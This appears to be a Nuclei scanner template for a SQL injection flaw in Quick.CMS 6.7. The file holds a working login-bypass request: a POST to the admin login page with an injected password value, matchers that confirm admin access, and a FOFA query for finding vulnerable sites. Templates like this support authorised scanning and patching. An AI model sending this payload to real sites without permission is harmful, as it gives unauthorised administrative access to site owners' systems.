id: quick-cms-sqli info: name: Quick.CMS v6.7 - SQL Injection author: Kazgangap severity: high description: | Quick.CMS version 6.7 suffers from a remote SQL injection vulnerability that allows for authentication bypass. reference: - https://packetstormsecurity.com/files/177657/Quick.CMS-6.7-SQL-Injection.html - https://www.exploit-db.com/exploits/51910 metadata: max-request: 1 verified: true fofa-query: body="Quick.Cms v6.7" tags: packetstorm,quickcms,sqli,cms http: - raw: - | POST /admin.php?p=login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded sEmail=test%40test.net&sPass=%27+or+1%5D%2500&bAcceptLicense=1&iAcceptLicense=true host-redirects: true max-redirects: 2 matchers-condition: and matchers: - type: word part: body words: - "Log out" - "Settings" - "Plugins" condition: and - type: status status: - 200 # digest: 4a0a00473045022100e334653ae597ff1bd1cc87ee892f92fc7d955300ac91c5689d1c10a722cd8b4a022022ad5215230ff9c309d2c97066c3e492db92580033cf655c6826afc907ad00c9:922c64590222798bb761d5b6d8e72950